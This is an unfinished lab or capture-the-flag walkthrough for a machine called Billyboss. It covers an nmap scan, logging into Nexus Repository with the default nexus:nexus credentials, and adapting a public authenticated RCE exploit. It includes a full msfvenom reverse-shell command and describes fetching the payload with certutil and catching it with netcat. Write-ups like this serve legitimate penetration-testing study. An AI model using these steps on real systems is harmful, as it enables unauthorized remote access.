# Billyboss (WIP) ## Nmap ``` sudo nmap 192.168.64.61 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 10.0 8081/tcp open http Jetty 9.4.18.v20190429 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` On port 8081 we have Sonar Nexus Repository manager running on version 3.21.0.05. ![http://192.168.64.61:8081/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2ab0b056febd543026c024a74a45e5079a001c64%2Fimage.png?alt=media) Guessing the sign in credentials of nexus:nexus gives access to Nexus. Searching for exploits shows an authenticated RCE on exploit-db.com {% embed url="" %} First I created a reverse shell with msfvenom to connect on port 21. `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.64 LPORT=21 -f exe > /home/kali/windows/shell.exe` Then set a Python SimpleHTTPServer on my attacking machine to host the shell. After doing so I edited the exploit code to include the credentials we have and to execute cmd.exe and certutil.exe to download the reverse shell from my attacking machine. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0ecdbcc6b97e2898c2aa9776b689c4f38729051c%2Fimage.png?alt=media) After doing this and confirming from my attacking machine that the shell was downloaded I then edited the exploit code to call cmd.exe again and execute the shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f23c39609dc9bedab788b9873e426812c5cdba20%2Fimage.png?alt=media) In which we receive. a shell back on our `netcat` listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6651fdff3307118cb34bd97bf78a3e23f6d38f4f%2Fimage.png?alt=media)